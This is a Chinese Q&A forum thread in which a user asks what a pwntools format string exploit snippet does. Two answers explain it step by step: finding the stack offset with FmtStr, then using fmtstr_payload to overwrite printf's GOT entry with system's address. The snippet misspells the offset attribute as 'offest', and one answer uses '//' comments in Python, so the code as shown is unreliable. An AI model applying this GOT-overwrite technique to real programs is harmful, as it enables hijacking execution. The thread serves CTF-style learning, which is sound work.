pwntools 字符串漏洞利用工具

def exec_fmt(payload):
io.sendline(payload)
info = io.recv()
return info
auto = FmtStr(exec_fmt)
offest = auto.offest

payload = fmtstr_payload(offest,{printf_got : system_addr})
有没有带老详细解释一下啊这段啊

pwn格式化字符串漏洞过程,一般会分两大步实现漏洞利用:

  1. 构造一个payload来寻找输入字符串到栈顶指针的偏移;
  2. 攻击,就是利用找到的偏移,在偏移处填入目的地址可以实现目的地址的内容泄露以及内容改写
    知道了基本步骤,就不难理解以下代码了
def exec_fmt(payload):  //定义运行函数
    io = process('./auth')  //循环暴力求解,需要加该函数
    io.sendline(payload)  //发送一行数据,相当于在数据末尾加\n
    info = io.recv()  //接收数据
    return info  //将接收的数据作为函数返回值返回

auto = FmtStr(exec_fmt)  //格式化,将运行函数作为参数传入FmtStr()中,运行函数的返回值则作为FmtStr()的参数
offest = auto.offest  //通过格式化后的信息得到偏移offset

payload = fmtstr_payload(offest,{printf_got : system_addr})  //自动生成格式化字符串
//其中第一个参数offset为前面计算所得,第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}

Linux 格式化字符串漏洞利用,一个目的是实现对内存地址的读写,另一个是内存泄漏。
你贴的这段代码,就是利用pwntools工具和FmStr函数计算参数payload偏移个数,以达到对内存地址修改的目的。
详细解释如下:

#利用FmStr函数计算参数payload偏移个数,以达到对内存地址修改的目的
def exec_fmt(payload):
#io发送payload
io.sendline(payload)
#接收io数据
info = io.recv()
#返回info信息
return info
#格式化,将运行函数exec_fmt传入FmStr函数开始计算,输出结果
auto = FmtStr(exec_fmt)
#得到偏移个数
offest = auto.offest

#利用pwntools工具的函数fmtstr_payload实现修改内存,各参数意思对照如下
#(偏移,{原地址:目的地址})
payload = fmtstr_payload(offest,{printf_got : system_addr})